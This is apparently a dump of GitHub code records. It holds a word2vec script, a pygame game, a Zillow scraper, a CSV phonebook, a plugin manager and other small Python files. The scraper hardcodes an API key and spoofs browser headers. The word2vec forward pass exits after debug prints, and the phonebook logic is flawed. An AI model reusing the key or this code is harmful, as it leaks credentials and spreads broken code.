-input_embedding.unsqueeze(2)).squeeze() # B * (2*C*K)\n print(\"log_pos size:\", log_pos.size())\n print(\"log_neg size:\", log_neg.size())\n log_pos = F.logsigmoid(log_pos).sum(1)\n log_neg = F.logsigmoid(log_neg).sum(1)\n\n loss = log_pos + log_neg\n print(\"log_pos size:\", log_pos.size())\n print(\"log_neg size:\", log_neg.size())\n print(\"loss size:\", loss.size())\n sys.exit()\n\n # 计算负对数释然\n return -loss\n\n def input_embeddings(self):\n return self.in_embed.weight.data.cpu().numpy()\n\nmodel = 
EmbeddingModel(VOCAB_SIZE, EMBEDDING_SIZE)\nif USE_CUDA:\n model = model.cuda()\n\ndef evaluate(filename, embedding_weights):\n if filename.endswith(\".csv\"):\n data = pd.read_csv(filename, sep=\",\")\n else:\n data = pd.read_csv(filename, sep=\"\\t\")\n human_similarity = []\n model_similarity = []\n for i in data.iloc[:, 0:2].index:\n word1, word2 = data.iloc[i, 0], data.iloc[i, 1]\n if word1 not in word_to_idx or word2 not in word_to_idx:\n continue\n else:\n word1_idx, word2_idx = word_to_idx[word1], word_to_idx[word2]\n word1_embed, word2_embed = embedding_weights[[word1_idx]], embedding_weights[[word2_idx]]\n model_similarity.append(float(sklearn.metrics.pairwise.cosine_similarity(word1_embed, word2_embed)))\n human_similarity.append(float(data.iloc[i, 2]))\n\n return scipy.stats.spearmanr(human_similarity, model_similarity)# , model_similarity\n\ndef find_nearest(word):\n index = word_to_idx[word]\n embedding = embedding_weights[index]\n cos_dis = np.array([scipy.spatial.distance.cosine(e, embedding) for e in embedding_weights])\n return [idx_to_word[i] for i in cos_dis.argsort()[:10]]\n\n\nif __name__ == '__main__':\n\n optimizer = torch.optim.SGD(model.parameters(), lr=LEARNING_RATE)\n for e in range(NUM_EPOCHS):\n for i, (input_labels, pos_labels, neg_labels) in enumerate(dataloader):\n\n # print(input_labels.size()) # [128]\n # print(pos_labels.size()) # [128, 6]\n # print(neg_labels.size()) # [128, 600]\n\n input_labels = input_labels.long()\n pos_labels = pos_labels.long()\n neg_labels = neg_labels.long()\n if USE_CUDA:\n input_labels = input_labels.cuda()\n pos_labels = pos_labels.cuda()\n neg_labels = neg_labels.cuda()\n\n optimizer.zero_grad()\n loss = model(input_labels, pos_labels, neg_labels).mean()\n loss.backward()\n optimizer.step()\n\n if i % 100 == 0:\n with open(LOG_FILE, \"a\") as fout:\n fout.write(\"epoch: {}, iter: {}, loss: {}\\n\".format(e, i, loss.item()))\n print(\"epoch: {}, iter: {}, loss: {}\".format(e, i, loss.item()))\n # 保存embedding\n embedding_weights = model.input_embeddings()\n torch.save(model.state_dict(), \"embedding-{}.th\".format(EMBEDDING_SIZE))","repo_name":"qiuxianghu88/Deep-Learning-and-Neural-Network","sub_path":"word2vec/word2vec_skipgram.py","file_name":"word2vec_skipgram.py","file_ext":"py","file_size_in_byte":8555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6298283140","text":"# one to read thought later\n\ndelta_force = [complex(x,y) for x in (-1,0,1) for y in (-1,0,1) if not x==y==0]\n\ndef neighbors(floor,loc,queen):\n for delta in delta_force:\n nloc = loc + delta\n while queen and nloc in floor and floor[nloc] == '.': nloc = nloc + delta\n if nloc in floor and floor[nloc]=='#': yield 1\n\ndef part(p, new_floor, floor = None):\n while floor != new_floor:\n floor = new_floor.copy()\n for loc in ( x for x in floor if floor[x] != '.' 
):\n n = sum(neighbors(floor,loc,p))\n if n > (3+p): new_floor[loc] = 'L'\n elif n == 0: new_floor[loc] = '#'\n print(f'part {p+1}: {sum(cell==\"#\" for cell in new_floor.values())}')\n\nlines = ( list(s.strip()) for s in open(day_11_path).readlines() )\nlines = { complex(x,y): cell for x,row in enumerate(lines) for y,cell in enumerate(row) }\npart(0,lines.copy())\n\npart(1,lines.copy())\n","repo_name":"mrzarquon/advent2020","sub_path":"day11/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13130619711","text":"import pygame\nimport actualizar\nfrom constantes import *\nfrom sonidos import *\nfrom objetos import *\n\npygame.init()\n\npantalla_juego = pygame.display.set_mode((ANCHO_PANTALLA, ALTO_PANTALLA+100))\npygame.display.set_caption('The Simpsons Memotest')\n\nsegundo = pygame.USEREVENT + 0\npygame.time.set_timer(segundo,1000)\n\ntiempo_de_inicio = pygame.USEREVENT + 1\npygame.time.set_timer(tiempo_de_inicio,3000)\n\ntablero_juego = Tablero()\ntextos_juego = Texto()\nimagen_juego = Imagen()\n\nsonido_fondo.play(-1)\n\nsegundos = 0\nminutos = 0\nrunning = True\njuego_iniciado = False\n\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n \n if juego_iniciado:\n if event.type == pygame.MOUSEBUTTONDOWN :\n tablero_juego.colision(event.pos)\n \n if not tablero_juego.verificar_juego_terminado():\n if event.type == segundo:\n segundos += 1\n if segundos == 60:\n minutos += 1\n segundos = 0\n \n else:\n if event.type == tiempo_de_inicio:\n juego_iniciado = True\n\n for tarjeta in tablero_juego.lista_tarjetas:\n tarjeta.visible = not juego_iniciado \n \n tablero_juego.update()\n pantalla_juego.blit(imagen_juego.juego_iniciado,(0,0))\n textos_juego.actualizar_tiempo(minutos, segundos)\n actualizar.render(tablero_juego, pantalla_juego, textos_juego)\n\n pygame.display.flip()\n\npygame.quit()","repo_name":"MauricioUno/Primer-Cuatrimestre-UnoMauricio","sub_path":"Programas Pygame/clase_16 POO/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27657367343","text":"import sys, getopt, requests, urllib, csv, time\nfrom fake_useragent import UserAgent\nfrom xml.etree import ElementTree\n\ndef main(argv):\n state, city = parse_args(argv)\n\n region_id = '12447' # get_zillow_region_id(state, city)\n print('zillow region id: ' + region_id)\n\n listings = get_zillow_listings_for_region(region_id)\n print('zillow listings in region found: ' + str(len(listings)))\n\n filename = write_listings_to_file(listings, state, city, region_id)\n print('output file: ' + filename)\n\ndef get_zillow_region_id(state, city):\n response = requests.get(\n 'https://www.zillow.com/webservice/GetRegionChildren.htm',\n params={\n 'zws-id': 'X1-ZWz1hkkltuo8wb_8tgid',\n 'city': city,\n 'state': state\n }\n )\n\n # it's fucking xml?!\n return ElementTree.fromstring(response.content).find('response').find('region').find('id').text\n\ndef get_zillow_listings_for_region(region_id):\n page = 1\n data = fetch_zillow_listings(region_id, page)\n total_result_count = data['cat1']['searchList']['totalResultCount']\n listings = data['cat1']['searchResults']['listResults']\n\n while total_result_count > 0:\n page += 1\n data = fetch_zillow_listings(region_id, page)\n listings += data['cat1']['searchResults']['listResults']\n 
total_result_count = data['cat1']['searchList']['totalResultCount']\n\n return list({v['zpid']:v for v in listings}.values())\n\ndef fetch_zillow_listings(region_id, page = 1):\n url = f\"https://www.zillow.com/search/GetSearchPageState.htm?{build_search_query(region_id, page)}\"\n print(url)\n response = requests.get(\n url,\n headers={\n 'user-agent': 'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.2; Trident/5.1)',\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-US,en;q=0.9',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-dest': 'empty',\n 'sec-gpc': '1',\n 'sec-fetch-site': 'none'\n }\n )\n\n if (response.status_code != 200):\n print('failed to obtain listings from zillow:')\n print(response.content)\n sys.exit(2)\n\n return response.json()\n\ndef build_search_query(region_id, page):\n min = 500000\n max = 2000000\n\n # need to url encode a json string so it can be used as a query param\n # lat/lng is required and is hard coded to cover continental usa to allow any american city\n # price range hard coded to 500k-2m\n return urllib.parse.urlencode(\n {\n 'searchQueryState': {\n \"pagination\": {\"currentPage\": page},\n \"mapBounds\": {\n \"west\": -124.848974,\n \"east\": -66.885444,\n \"south\": 24.396308,\n \"north\": 49.384358\n },\n \"regionSelection\": [{\"regionId\": region_id, \"regionType\": 6}],\n \"isMapVisible\": False,\n \"filterState\": {\n \"beds\": {\"min\": 2}, \"baths\":{\"min\": 2},\n \"isMultiFamily\": {\"value\":False}, \"isApartmentOrCondo\": {\"value\":False}, \"isApartment\": {\"value\":False}, \"isCondo\": {\"value\":False},\n \"isLotLand\": {\"value\": False}, \"isManufactured\": {\"value\":False},\n \"price\": {\"min\": min, \"max\": max}\n # \"doz\": {\"value\": \"6m\"}, \"isForSaleByAgent\": {\"value\": False},\n # \"isForSaleByOwner\": {\"value\": False}, \"isNewConstruction\": {\"value\": False},\n # \"isForSaleForeclosure\": {\"value\": False}, \"isComingSoon\": {\"value\": False},\n # \"isAuction\": {\"value\": False}, \"isPreMarketForeclosure\": {\"value\": False},\n # \"isPreMarketPreForeclosure\": {\"value\": False},\n # \"isRecentlySold\": {\"value\": True}, \"isAllHomes\": {\"value\": True},\n # \"hasPool\": {\"value\": True}, \"hasAirConditioning\": {\"value\": True},\n # \"isApartmentOrCondo\": {\"value\": False},\n },\n \"isListVisible\": True\n },\n 'wants': {\"cat1\": [\"listResults\"], \"cat2\": [\"total\"]},\n 'requestId': page\n }\n )\n # \"{\\\"pagination\\\":{\\\"currentPage\\\":%i},\\\"mapBounds\\\":{\\\"west\\\":-124.848974,\\\"east\\\":-66.885444,\\\"south\\\":24.396308,\\\"north\\\":49.384358},\\\"regionSelection\\\":[{\\\"regionId\\\":%s,\\\"regionType\\\":6}],\\\"isMapVisible\\\":false,\\\"filterState\\\":{\\\"price\\\":{\\\"min\\\":50000,\\\"max\\\":200000}},\\\"isListVisible\\\":true}\"%(page, region_id)\n\ndef write_listings_to_file(listings, state, city, region_id):\n # flatten the data so it can be stored as a csv\n flattened_listings = list(map(transform_listing, listings))\n filename = 'datasets/%s_%s_%s.csv'%(city, state, region_id)\n keys = flattened_listings[0].keys()\n with open(filename, 'w', newline='') as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(flattened_listings)\n \n return filename\n\ndef transform_listing(listing):\n # additional_data = fetch_additional_data(listing)\n # print(additional_data)\n homeInfo = listing['hdpData']['homeInfo']\n return {\n 'address': listing['address'],\n 'zipcode': 
homeInfo.get('zipcode', None),\n 'type': homeInfo.get('homeType', None),\n 'status': homeInfo.get('homeStatus', None),\n 'other_status': listing['statusText'],\n 'price': homeInfo.get('price', None),\n # 'last_sold_price': additional_data.get('lastSoldPrice', None),\n # 'tax_assessed_value': additional_data.get('taxAssessedValue', None),\n # 'tax_assessed_year': additional_data.get('taxAssessedYear', None),\n # 'mortgage_rate': additional_data['mortgageRates'].get('thirtyYearFixedRate', None),\n # 'propert_tax_rate': additional_data.get('propertyTaxRate', None),\n 'zestimate': homeInfo.get('zestimate', None),\n 'festimate': homeInfo.get('festimate', None),\n 'rent_zestimate': homeInfo.get('rentZestimate', None),\n 'beds': listing['beds'],\n 'baths': listing['baths'],\n 'area': listing['area'],\n 'year': homeInfo.get('yearBuilt', None),\n 'price_reduction': homeInfo.get('priceReduction', None),\n 'price_increase': homeInfo.get('priceChange', None),\n 'days_on_zillow': homeInfo.get('daysOnZillow', None),\n 'extra_info': listing['variableData']['text'],\n 'extra_info_type': listing['variableData']['type'],\n 'zpid': listing['zpid'],\n 'id': listing['id'],\n 'link': listing['detailUrl']\n }\n\ndef fetch_additional_data(listing):\n response = requests.post(\n 'https://www.zillow.com/graphql/',\n params={\n 'zpid': listing['zpid'],\n 'queryId': '4f7d72d05b119ce8d8cc87dc6f5c6cc2',\n 'operationName': 'ForSaleDoubleScrollFullRenderQuery'\n },\n headers={\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',\n 'origin': 'https://www.zillow.com',\n 'referer': listing['detailUrl'],\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-US,en;q=0.9'\n },\n json={\n \"operationName\": \"ForSaleDoubleScrollFullRenderQuery\",\n \"variables\": {\n \"zpid\": listing['zpid'],\n \"contactFormRenderParameter\": {\n \"zpid\":listing['zpid'],\n \"platform\": \"desktop\",\n \"isDoubleScroll\": 'true'\n }\n },\n \"clientVersion\": \"home-details/5.49.24.2.master.ee287a1\",\n \"queryId\":\"4f7d72d05b119ce8d8cc87dc6f5c6cc2\"\n }\n )\n\n print(response.url)\n if (response.status_code != 200):\n print('failed to obtain additional data for ' + listing['zpid'] + ':')\n print(response.content)\n return {}\n\n data = response.json()['data']['property']\n time.sleep(1)\n\n return {\n 'lastSoldPrice': data['lastSoldPrice'],\n 'taxAssessedValue': data['taxAssessedValue'],\n 'taxAssessedYear': data['taxAssessedYear'],\n 'mortgageRates': data.get('mortgageRates', { 'thirtyYearFixedRate': None }),\n 'propertyTaxRate': data['propertyTaxRate'],\n }\n\ndef parse_args(argv):\n try:\n opts, args = getopt.getopt(argv,'hs:c:',['state=','city='])\n except getopt.GetoptError:\n print('get_zillow_listings.py -s -c ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('get_zillow_listings.py -s -c ')\n sys.exit()\n elif opt in ('-s', '--state'):\n state = arg\n elif opt in ('-c', '--city'):\n city = arg\n\n try:\n state, city\n except NameError:\n print('both state and city are required')\n print('get_zillow_listings.py -s -c ')\n sys.exit(2)\n return state, city\n\nif __name__ == '__main__':\n 
main(sys.argv[1:])","repo_name":"hankedori/real-estate","sub_path":"script/get_zillow_listings.py","file_name":"get_zillow_listings.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20545682721","text":"from time import sleep\n\nfrom selenium.webdriver.common.by import By\n\nfrom base.base import Base\n\n\nclass WebBase(Base):\n \"\"\"以下为web项目专属方法\"\"\"\n # 根据显示的文本点击指定的元素\n def web_base_click_element(self,placeholder_text,click_text):\n # 1.点击父选框\n loc = By.CSS_SELECTOR, \" [placeholder = '{}'] \".format(placeholder_text)\n self.base_click(loc)\n # 暂停\n sleep(1)\n # 点击包含显示文本的元素\n loc = By.XPATH, \"//*[text()='{}']\".format(click_text)\n self.base_click(loc)\n","repo_name":"2761594771/uiAutoTestHmtt3","sub_path":"base/web_base.py","file_name":"web_base.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40282710366","text":"import csv\nimport sys\nimport datetime\n\n# create contact list\n\n\ndef AddContact():\n name = input(\"name: \").strip()\n number = int(input(\"phonenumber: \").strip())\n email = input(\"email: \").strip()\n address = input(\"address: \").strip()\n\n # store input in a dictionary format\n contactInfor = dict(name=name, number=number, email=email,\n address=address, date_created=datetime.date.today())\n\n # then store that same information in a csv file.\n with open('phonedata.csv', 'a', newline='') as contact:\n fieldnames = ['name', 'number', 'email', 'address', 'date_created']\n writer = csv.DictWriter(contact, fieldnames=fieldnames)\n writer.writerow(contactInfor)\n\n # Avoid reruning the script, ask users if they would like to add another contact:\n add_query = input(\"Do you want to search something else? Y/N: \")\n if add_query == 'Y':\n add = AddContact()\n elif add_query == 'N':\n print((\"*\")*20, end=None)\n print(\"You are logged out\")\n print((\"*\")*20, end=None)\n print(\"Thank you for using our service\")\n sys.exit()\n return add\n\n# Searching for contact: by name, number, email, address or date\n# Linear search\n\n\ndef ContactSearch():\n # Open the csv file containing list of contacts:\n with open('phonedata.csv', newline='') as file:\n # convert the csv into readerable dict\n reader = list(csv.DictReader(file))\n q = input(\"Enter name or Number: \") # search query :\n for i in range(0, len(reader)):\n if q in reader[i].values(): # q can be name, number, email, address\n print((\"#\")*20, \"Printing Results\", (\"#\")*20, end=None)\n # return items where the query matched.\n result = reader[i].items()\n print(result)\n print((\"#\")*20, \"done Printing\", (\"#\")*20, end=None)\n break\n # Avoid printing not found anytime q is not found in reader[i].\n if q not in reader[i].values():\n # Until the program loops through the whole dict, then print the not found\n continue\n else:\n print((\"#\")*20, end=None)\n print(\"Please the contact can't be found!!\")\n print((\"#\")*20, end=None)\n\n # asking for more actions\n search_query = input(\"Do you want to search something else? 
Y/N: \")\n    if search_query == 'Y':\n        search = ContactSearch()\n    elif search_query == 'N':\n\n        print((\"*\")*20, end=None)\n\n        search = \"logging you out\"\n        print(search + \"done\")\n        print((\"*\")*20, end=None)\n        print(\"Thank you for using our services\")\n        sys.exit()\n    return search\n\ndef contactdelete():\n    lines = list()\n    members = input(\"Please enter a number to be deleted\")\n    with open('phonedata.csv', newline='') as delfile:\n        reader = csv.reader(delfile)\n        for row in reader:\n            lines.append(row)\n            for field in row:\n                if field == members:\n                    lines.remove(row)\n\n    # Updating the CSV file: write the remaining rows back to the same file that was read.\n    with open(\"phonedata.csv\", 'w', newline=\"\") as writeFile:\n        writer = csv.writer(writeFile)\n        writer.writerows(lines)\n        print(\"deleted, Thank you\")\n        print(lines)\n    sys.exit()\n\n\ndef welcome():\n    question = input(\n        \"How can I help? C: create contact, S: for search, D: for delete. \")\n    if question == \"C\":\n        follow = AddContact()\n    elif question == \"S\":\n        follow = ContactSearch()\n    elif question == \"D\":\n        follow = contactdelete()\n    return follow\n\n\nwelcome()\n","repo_name":"gilbertekalea/phonebook","sub_path":"phonebook.py","file_name":"phonebook.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16342592583","text":"\"\"\"\n@Author: Kasugano Sora\n@Github: https://github.com/jiangyuxiaoxiao\n@Date: 2023/6/30-23:35\n@Desc: \n@Ver : 1.0.0\n\"\"\"\nimport json\nimport aiofiles\nimport os\nfrom nonebot import get_loaded_plugins\nfrom Hiyori.Utils.File import JsonFileExist, DirExist\n\n\nclass pluginsManager:\n    GroupPluginInfo: dict[str, dict[str, bool]] = dict()\n    UserPluginInfo: dict[str, dict[str, bool]] = dict()\n    GroupJsonPath: str = \"./Config/Plugin_Manager/groupConfig.json\"\n    UserJsonPath: str = \"./Config/Plugin_Manager/userConfig.json\"\n\n    # 初始化\n    @staticmethod\n    def LoadConfig():\n        \"\"\"初始化,从json文件加载配置\"\"\"\n        DirExist(os.path.dirname(pluginsManager.GroupJsonPath))\n        JsonFileExist(pluginsManager.GroupJsonPath)\n        JsonFileExist(pluginsManager.UserJsonPath)\n        pluginsManager.GroupPluginInfo.clear()\n        pluginsManager.UserPluginInfo.clear()\n        # 加载群插件配置\n        with open(pluginsManager.GroupJsonPath, encoding=\"utf-8\", mode=\"r\") as file:\n            info = file.read()\n            pluginsManager.GroupPluginInfo = json.loads(info)\n        # 加载用户插件配置\n        with open(pluginsManager.UserJsonPath, encoding=\"utf-8\", mode=\"r\") as file:\n            info = file.read()\n            pluginsManager.UserPluginInfo = json.loads(info)\n\n    # 保存群组配置\n    @staticmethod\n    async def SaveGroupConfig():\n        \"\"\"保存群组配置\"\"\"\n        async with aiofiles.open(pluginsManager.GroupJsonPath, encoding=\"utf-8\", mode=\"w\") as file:\n            info = json.dumps(pluginsManager.GroupPluginInfo, indent=2, ensure_ascii=False)\n            await file.write(info)\n\n    # 保存个人配置\n    @staticmethod\n    async def SaveUserConfig():\n        \"\"\"保存个人配置\"\"\"\n        async with aiofiles.open(pluginsManager.UserJsonPath, encoding=\"utf-8\", mode=\"w\") as file:\n            info = json.dumps(pluginsManager.UserPluginInfo, indent=2, ensure_ascii=False)\n            await file.write(info)\n\n    # 判断群组的对应插件是否开启,若开启返回True,否则返回False\n    @staticmethod\n    def GroupPluginIsOn(GroupID: str, PluginName: str) -> bool:\n        \"\"\"判断群组的对应插件是否开启,若开启返回True,否则返回False\"\"\"\n        # 检查插件是否常驻\n        if pluginsManager.PluginKeepOn(PluginName):\n            return True\n        if GroupID in pluginsManager.GroupPluginInfo.keys():\n            GroupInfo = pluginsManager.GroupPluginInfo[GroupID]\n            # 检查是否开启白名单模式\n            if \"WhiteList\" in GroupInfo.keys():\n                # 若开启了白名单模式\n                if GroupInfo[\"WhiteList\"]:\n                    if 
PluginName in GroupInfo.keys():\n return GroupInfo[PluginName]\n else:\n return False\n # 未开启白名单模式\n if PluginName in GroupInfo.keys():\n return GroupInfo[PluginName]\n return True\n\n # 判断用户的对应插件是否开启,若开启返回True,否则返回False\n @staticmethod\n def UserPluginIsOn(QQ: str, PluginName: str) -> bool:\n \"\"\"判断用户的对应插件是否开启,若开启返回True,否则返回False\"\"\"\n # 检查插件是否常驻\n if pluginsManager.PluginKeepOn(PluginName):\n return True\n if QQ in pluginsManager.UserPluginInfo.keys():\n UserInfo = pluginsManager.UserPluginInfo[QQ]\n # 检查是否开启白名单模式\n if \"WhiteList\" in UserInfo.keys():\n # 若开启了白���单模式\n if UserInfo[\"WhiteList\"]:\n if PluginName in UserInfo.keys():\n return UserInfo[PluginName]\n else:\n return False\n # 未开启白名单模式\n if PluginName in UserInfo.keys():\n return UserInfo[PluginName]\n return True\n\n # 更改群组插件状态\n @staticmethod\n async def ChangeGroupPluginStatus(GroupID: str, PluginName: str, status: bool):\n if GroupID not in pluginsManager.GroupPluginInfo:\n pluginsManager.GroupPluginInfo[GroupID] = dict()\n pluginsManager.GroupPluginInfo[GroupID][PluginName] = status\n await pluginsManager.SaveGroupConfig()\n\n # 改变个人插件状态\n @staticmethod\n async def ChangeUserPluginStatus(QQ: str, PluginName: str, status: bool):\n if QQ not in pluginsManager.UserPluginInfo:\n pluginsManager.UserPluginInfo[QQ] = dict()\n pluginsManager.UserPluginInfo[QQ][PluginName] = status\n await pluginsManager.SaveUserConfig()\n\n # 获取在黑名单模式下,群组已关闭插件列表\n @staticmethod\n def GetGroupOffPlugins(GroupID: str) -> list[str]:\n \"\"\"\n 获取在黑名单模式下,群组已关闭插件列表\n\n :param GroupID: 群号\n :return: 已关闭的插件的列表【黑名单模式下】\n \"\"\"\n result = []\n if GroupID not in pluginsManager.GroupPluginInfo.keys():\n return result\n else:\n groupInfo = pluginsManager.GroupPluginInfo[GroupID]\n if len(groupInfo) != 0:\n for pluginName, status in groupInfo.items():\n if not status and pluginName != \"WhiteList\":\n result.append(pluginName)\n return result\n\n # 获取在白名单模式下,群组已开启插件列表\n @staticmethod\n def GetGroupOnPlugins(GroupID: str) -> list[str]:\n \"\"\"\n 获取在白名单模式下,群组已开启插件列表\n\n :param GroupID: 群号\n :return: 已开启的插件的列表【白名单模式下】\n \"\"\"\n result = []\n if GroupID not in pluginsManager.GroupPluginInfo.keys():\n return result\n else:\n groupInfo = pluginsManager.GroupPluginInfo[GroupID]\n if len(groupInfo) != 0:\n for pluginName, status in groupInfo.items():\n if status and pluginName != \"WhiteList\":\n result.append(pluginName)\n return result\n\n # 获取在黑名单模式下,个人已关闭插件列表\n @staticmethod\n def GetUserOffPlugins(QQ: str) -> list[str]:\n \"\"\"\n 获取在黑名单模式下,个人已关闭插件列表\n\n :param QQ: QQ号\n :return: 已关闭的插件的列表【黑名单模式下】\n \"\"\"\n result = []\n if QQ not in pluginsManager.UserPluginInfo.keys():\n return result\n else:\n userInfo = pluginsManager.UserPluginInfo[QQ]\n for pluginName, status in userInfo.items():\n if not status and pluginName != \"WhiteList\":\n result.append(pluginName)\n return result\n\n # 获取在黑名单模式下,个人已关闭插件列表\n @staticmethod\n def GetUserOnPlugins(QQ: str) -> list[str]:\n \"\"\"\n 获取在黑名单模式下,个人已关闭插件列表\n\n :param QQ: QQ号\n :return: 已开启的插件的列表【白名单模式下】\n \"\"\"\n result = []\n if QQ not in pluginsManager.UserPluginInfo.keys():\n return result\n else:\n userInfo = pluginsManager.UserPluginInfo[QQ]\n for pluginName, status in userInfo.items():\n if status and pluginName != \"WhiteList\":\n result.append(pluginName)\n return result\n\n # 检查群组是否是白名单模式\n @staticmethod\n def GroupWhiteListStatus(GroupID: str) -> bool:\n \"\"\"\n 检查群组是否是白名单模式,若是则返回True\n\n :param GroupID: 群号\n :return: 是否是白名单模式\n \"\"\"\n # 默认为黑名单模式\n if GroupID not in 
pluginsManager.GroupPluginInfo.keys():\n return False\n else:\n groupInfo = pluginsManager.GroupPluginInfo[GroupID]\n if \"WhiteList\" not in groupInfo.keys():\n return False\n else:\n return groupInfo[\"WhiteList\"]\n\n # 检查用户是否是白名单模式\n @staticmethod\n def UserWhiteListStatus(QQ: str) -> bool:\n \"\"\"\n 检查用户是否是白名单模式,若是则返回True\n\n :param QQ: QQ号\n :return: 是否是白名单模式\n \"\"\"\n # 默认为黑名单模式\n if QQ not in pluginsManager.UserPluginInfo.keys():\n return False\n else:\n userInfo = pluginsManager.UserPluginInfo[QQ]\n if \"WhiteList\" not in userInfo.keys():\n return False\n else:\n return userInfo[\"WhiteList\"]\n\n # 检查插件是否常驻\n @staticmethod\n def PluginKeepOn(PluginName: str) -> bool:\n \"\"\"\n 检查插件是否常驻\n\n :param PluginName: 插件名\n :return: 若插件常驻则返回True,否则返回False\n \"\"\"\n plugins = get_loaded_plugins()\n for plugin in plugins:\n if hasattr(plugin.metadata, \"name\"):\n if plugin.metadata.name == PluginName:\n if hasattr(plugin.metadata, \"extra\"):\n extraInfo = plugin.metadata.extra\n if \"Keep_On\" in extraInfo.keys():\n return extraInfo[\"Keep_On\"]\n return False\n return False\n","repo_name":"jiangyuxiaoxiao/Hiyori","sub_path":"Hiyori/Plugins/Basic_plugins/Plugin_Manager/pluginManager.py","file_name":"pluginManager.py","file_ext":"py","file_size_in_byte":9507,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"27"} +{"seq_id":"74838827272","text":"import Poly\nimport Mat\nimport pdb\n\n#Convert a polynomial with matrix coefficients to a matrix with\n#polynomial entries\ndef polyMatToMatPoly(Ms,field):\n ring=Poly.Poly(field)\n m=Ms[0].m\n n=Ms[0].n\n A=Mat.Mat(ring,m,n)\n for k in xrange(len(Ms)):\n for i in xrange(m):\n for j in xrange(n):\n d=A.getElt(i,j)\n d=ring.timesXPower(d,1)\n e=ring.fromScalar(Ms[k].getElt(i,j))\n d=ring.add(d,e)\n A.setElt(i,j,d)\n return A\n","repo_name":"alexstachnik/block-wiedemann-example","sub_path":"PolyAlg.py","file_name":"PolyAlg.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"4621886090","text":"import cohere\nfrom attr import define, field, Factory\nfrom griptape.artifacts import TextArtifact\nfrom griptape.drivers import BasePromptDriver\nfrom griptape.tokenizers import CohereTokenizer\nfrom griptape.utils import PromptStack\n\n\n@define\nclass CoherePromptDriver(BasePromptDriver):\n \"\"\"\n Attributes: \n api_key: Cohere API key.\n model: \tCohere model name. 
Defaults to `xlarge`.\n client: Custom `cohere.Client`.\n tokenizer: Custom `CohereTokenizer`.\n \"\"\"\n api_key: str = field(kw_only=True)\n model: str = field(default=CohereTokenizer.DEFAULT_MODEL, kw_only=True)\n client: cohere.Client = field(\n default=Factory(lambda self: cohere.Client(self.api_key), takes_self=True), kw_only=True\n )\n tokenizer: CohereTokenizer = field(\n default=Factory(lambda self: CohereTokenizer(model=self.model, client=self.client), takes_self=True),\n kw_only=True\n )\n\n def try_run(self, prompt_stack: PromptStack) -> TextArtifact:\n prompt = self.prompt_stack_to_string(prompt_stack)\n result = self.client.generate(\n prompt=prompt,\n model=self.model,\n temperature=self.temperature,\n end_sequences=self.tokenizer.stop_sequences,\n max_tokens=self.max_output_tokens(prompt)\n )\n\n if len(result.generations) == 1:\n generation = result.generations[0]\n\n return TextArtifact(\n value=generation.text.strip()\n )\n else:\n raise Exception(\"Completion with more than one choice is not supported yet.\")\n","repo_name":"griptape-ai/griptape","sub_path":"griptape/drivers/prompt/cohere_prompt_driver.py","file_name":"cohere_prompt_driver.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":1275,"dataset":"github-code","pt":"27"} +{"seq_id":"36688794859","text":"import xml.etree.ElementTree as ET\r\nfrom xml.etree.ElementTree import Element\r\nfrom node import node_factory\r\nfrom node.node import Node\r\n\r\nnodes = []\r\n\r\n\r\ndef load(file):\r\n data = ET.parse(file)\r\n root: Element = data.getroot()\r\n xml_nodes = root.findall(\"node\")\r\n\r\n for xml_node in xml_nodes:\r\n nodes.append(node_factory.get_node(xml_node))\r\n\r\n\r\ndef get_node_by_id(index: int) -> Node:\r\n for node in nodes:\r\n if node.node_index == index:\r\n return node\r\n return None","repo_name":"pxtree/DreamsBot","sub_path":"scenario.py","file_name":"scenario.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"29328567504","text":"import numpy as np\nfrom brian2 import *\n\nclass Spike_Stats:\n '''\n Description: Given spike times of each neuron, statistical parameters of ISI(Inter-Spike-Interval) can be calculated\n like mean, variance, co-efficent of variation. 
